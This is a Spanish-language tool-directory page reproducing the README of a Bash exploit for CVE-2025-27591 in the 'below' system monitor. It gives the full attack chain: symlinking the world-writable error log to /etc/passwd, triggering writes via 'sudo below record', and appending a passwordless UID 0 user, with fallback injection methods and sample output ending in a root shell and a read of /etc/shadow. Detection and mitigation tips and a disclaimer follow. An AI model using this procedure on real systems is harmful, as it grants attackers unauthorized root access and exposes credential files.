Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Below-Logger-Symlink-Attack_CVE-2025-27591 — Un exploit de escalada de privilegios basado en Bash que ataca la herramienta de monitoreo de rendimiento del sistema `below`. Este exploit renovado aprovecha una vulnerabilidad de enlace simbólico en el mecanismo de registro para inyectar un usuario root en `/etc/passwd`, obteniendo acceso root completo. | Kitploit
Herramientas/GitHubGitHub/0xdtc/below-logger-symlink-attack_cve-2025-27591
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHub0xdtc/below-logger-symlink-attack_cve-2025-27591

Below-Logger-Symlink-Attack_CVE-2025-27591

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Un exploit de escalada de privilegios basado en Bash que ataca la herramienta de monitoreo de rendimiento del sistema `below`. Este exploit renovado aprovecha una vulnerabilidad de enlace simbólico en el mecanismo de registro para inyectar un usuario root en `/etc/passwd`, obteniendo acceso root completo.

Ver Repositorio
21hace 10 mesesAún no revisado
Compartir

Buy me a knowledge

CVE-2025-27591 Exploit - Ataque de Enlace Simbólico del Logger Below

Un exploit de escalada de privilegios basado en Bash dirigido a la herramienta de monitoreo de rendimiento del sistema below. Este exploit renovado aprovecha una vulnerabilidad de enlace simbólico en el mecanismo de registro para inyectar un usuario root en /etc/passwd, logrando acceso root completo.

Créditos

Descubierto y reportado por Matthias Gerstner @ SUSE - Aviso de Seguridad

Detalles de la Vulnerabilidad

  • CVE: CVE-2025-27591
  • Componente Afectado: /usr/bin/below (monitor de rendimiento del sistema de Facebook)
  • Versiones Afectadas: Versiones de below con directorios de log de escritura mundial
  • Tipo de Vulnerabilidad: Ataque de Enlace Simbólico / Escalada de Privilegios
  • Vector de Ataque: /var/log/below/error_root.log → /etc/passwd
  • Puntuación CVSS: Alta (Escalada de Privilegios a Root)

Descripción General

La herramienta de monitoreo below registra errores en /var/log/below/error_root.log cuando se ejecuta con privilegios elevados. Si el directorio de logs es escribible por cualquier usuario, un atacante puede:

  1. Crear un enlace simbólico desde error_root.log hacia /etc/passwd
  2. Ejecutar el comando below record para escribir mensajes de error en el enlace simbólico
  3. Inyectar manualmente una entrada de usuario maliciosa con UID=0 (privilegios root)
  4. Obtener una shell root usando el usuario recién creado

Este exploit automatiza todo el proceso con mecanismos de respaldo inteligentes para manejar diversas configuraciones del sistema.

Diagrama de Flujo del Exploit

root@kitploit:~
flowchart TD
    A[Start Exploit] --> B[Get Username from User]
    B --> C{Check /var/log/below<br/>World-Writable?}
    C -->|No| D[Exit: Not Vulnerable]
    C -->|Yes| E[Remove Existing error_root.log]
    E --> F[Create Symlink:<br/>error_root.log → /etc/passwd]
    F --> G{Symlink Created<br/>Successfully?}
    G -->|No| D
    G -->|Yes| H[Execute: sudo below record]
    H --> I[Wait 3 seconds for logging]
    I --> J[Kill below process]
    J --> K{Payload in<br/>/etc/passwd?}
    K -->|Yes| M[Success Path]
    K -->|No| L[Attempt Manual Injection:<br/>echo payload >> symlink]
    L --> N{Manual Injection<br/>Success?}
    N -->|No| O[Try Fallback:<br/>sudo tee -a]
    N -->|Yes| M
    O --> P{Fallback<br/>Success?}
    P -->|No| D
    P -->|Yes| M
    M --> Q[Verify Payload in /etc/passwd]
    Q --> R[Disable Cleanup Trap]
    R --> S[Execute: su username]
    S --> T[Root Shell Obtained]

    style A fill:#e1f5ff
    style T fill:#90EE90
    style D fill:#ffcccb
    style M fill:#98fb98

Detalles Técnicos

Pasos de Explotación

  1. Fase de Verificación Previa

    • Verificar que el directorio /var/log/below exista
    • Comprobar si el directorio tiene permisos de escritura mundial (o+w)
    • Probar la capacidad de creación de enlaces simbólicos
  2. Fase de Configuración

    • Eliminar cualquier archivo error_root.log existente
    • Crear enlace simbólico: /var/log/below/error_root.log → /etc/passwd
    • Verificar que el enlace apunte al objetivo correcto
  3. Fase de Inyección (Método Principal)

    • Ejecutar sudo below record en segundo plano
    • Permitir que el proceso se ejecute durante 3 segundos para activar el registro de errores
    • Matar el proceso para evitar el registro continuo
    • Verificar si los mensajes de error corrompieron /etc/passwd de manera útil
  4. Fase de Inyección (Métodos de Respaldo)

    • Método 1: Añadir directamente a través del enlace simbólico (echo >> symlink)
    • Método 2: Usar sudo con tee (sudo tee -a)
  5. Fase de Obtención de Shell

Estructura del Payload

La entrada inyectada en /etc/passwd sigue este formato:

root@kitploit:~
username::0:0:username:/root:/bin/bash

Desglose de Campos:

  • username: Nombre de usuario proporcionado por el usuario (por defecto: "0xdtc")
  • ::: Campo de contraseña vacío (sin contraseña requerida)
  • 0:0: UID=0, GID=0 (privilegios root)
  • username: Campo GECOS (descripción del usuario)
  • /root: Directorio home
  • /bin/bash: Shell de inicio de sesión

Requisitos Previos

  • Sistema objetivo ejecutando el binario below vulnerable
  • El directorio /var/log/below debe ser escribible por cualquier usuario
  • El usuario debe tener acceso sudo para ejecutar below record
  • Entorno de shell Bash

Uso

Ejecución Básica

root@kitploit:~
# Hacer el script ejecutable
chmod +x CVE-2025-27591

# Ejecutar el exploit
./CVE-2025-27591

Indicaciones Interactivas

root@kitploit:~
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): myuser
[+] Using username: myuser

Salida de Ejemplo

root@kitploit:~
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): 0xdtc
[+] Using username: 0xdtc

[*] Checking for CVE-2025-27591 vulnerability
[+] /var/log/below is world-writable
[*] Testing symlink creation
[+] Symlink test successful
[+] Target is vulnerable

[*] Starting exploitation
[+] Wrote payload to /tmp/exploit_payload
[*] Creating symlink: /var/log/below/error_root.log -> /etc/passwd
[+] Symlink created
[*] Executing 'sudo below record' to trigger logging
[*] Started 'below record' with PID: 12345
[*] Checking if payload was written
[*] Attempting manual injection
[*] Appending payload to /etc/passwd via symlink
[+] Payload appended
[+] Exploitation completed! Payload is in /etc/passwd
[*] Spawning root shell via 'su 0xdtc'
[*] Password should be empty, just press Enter

root@kali:/tmp# whoami
root

Características

Manejo Inteligente de Bloqueos

El script incluye múltiples mecanismos de respaldo para manejar diversas configuraciones del sistema:

  1. Manejo de Archivos Existentes

    • Detecta y elimina automáticamente archivos de log existentes
    • Maneja tanto archivos regulares como enlaces simbólicos existentes
    • Valida el destino del enlace simbólico antes de continuar
  2. Múltiples Métodos de Inyección

    • Primario: Desencadenar mediante el registro de errores de below record
    • Respaldo 1: Añadir directamente al enlace simbólico
    • Respaldo 2: Escritura privilegiada usando sudo tee
  3. Gestión de Procesos

    • Mata automáticamente procesos colgados de below
    • Previene el agotamiento de recursos
    • Maneja la limpieza de procesos en caso de fallo
  4. Detección de Re-ejecución

    • Verifica si el payload ya existe en /etc/passwd
    • Omite la explotación si el usuario ya fue creado
    • Obtiene directamente una shell al re-ejecutar

Características de Calidad del Código

  • Comentarios Exhaustivos: Cada función y paso crítico documentado
  • Encabezados de Sección: Código organizado en secciones lógicas
  • Manejo de Errores: Verificación adecuada de errores y retroalimentación al usuario
  • Salida Limpia: Handlers de trap para una limpieza ordenada en caso de fallo
  • Dependencias Mínimas: Bash puro con herramientas Unix estándar

Estructura de Archivos

root@kitploit:~
.
├── CVE-2025-27591           # Script principal de explotación
├── README.md           # Esta documentación
└── /tmp/exploit_payload # Archivo de payload temporal (creado en tiempo de ejecución)

Verificación

Después de una explotación exitosa, verifica el acceso root:

root@kitploit:~
# Comprobar usuario actual
root@target:/tmp# whoami
root

# Comprobar ID de usuario y grupos
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

# Verificar usuario en /etc/passwd
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash

# Leer archivos solo root
root@target:/tmp# cat /etc/shadow
[... shadow file contents ...]

Limpieza

Si necesitas eliminar el usuario malicioso después de las pruebas:

root@kitploit:~
# Eliminar el usuario inyectado de /etc/passwd
sudo sed -i '/^nombredeusuario:/d' /etc/passwd

# Eliminar cualquier enlace simbólico sobrante
rm -f /var/log/below/error_root.log

Reemplaza nombredeusuario con el nombre de usuario real que usaste durante la explotación.

Detección y Mitigación

Métodos de Detección

  1. Monitoreo de Integridad de Archivos

    root@kitploit:~
    # Monitorear /etc/passwd en busca de cambios no autorizados
    aide --check
    
  2. Detección de Enlaces Simbólicos

    root@kitploit:~
    # Buscar enlaces simbólicos sospechosos en directorios de log
    find /var/log -type l -ls
    
  3. Registros de Auditoría

    root@kitploit:~
    # Verificar uso sospechoso de sudo
    grep "below record" /var/log/auth.log
    

Estrategias de Mitigación

  1. Corregir Permisos de Directorio

    root@kitploit:~
    # Eliminar permiso de escritura mundial del directorio de log
    sudo chmod 755 /var/log/below
    
  2. Políticas AppArmor/SELinux

    • Implementar controles de acceso obligatorios
    • Restringir ubicaciones de escritura de archivos del binario below
  3. Actualizar Below

    • Aplicar parches de seguridad de Facebook/Meta
    • Usar actualizaciones del gestor de paquetes
  4. Monitorear /etc/passwd

    • Configurar monitoreo de integridad de archivos (AIDE, Tripwire)
    • Alertar sobre adiciones de usuarios con UID=0

Aviso Legal

Este exploit está destinado únicamente a fines educativos y pruebas de penetración autorizadas.

El acceso no autorizado a sistemas informáticos es ilegal. Utilice esta herramienta solo en sistemas donde tenga permiso explícito para realizar pruebas de seguridad. El(los) autor(es) no asumen ninguna responsabilidad por el mal uso de esta herramienta.

Al usar este exploit, usted reconoce que:

  • Tiene la autorización adecuada para probar el sistema objetivo
  • Comprende las leyes y regulaciones aplicables
  • Acepta la responsabilidad total de sus acciones

Repositorio: https://github.com/0xDTC/ Autor: Divine Clown (0xDTC) Licencia: Solo para uso educativo Última actualización: 2025-11-13

Descargar herramienta
  • Verificar que el usuario malicioso exista en /etc/passwd
  • Deshabilitar los traps de limpieza para evitar la eliminación
  • Ejecutar su <nombredeusuario> para obtener una shell root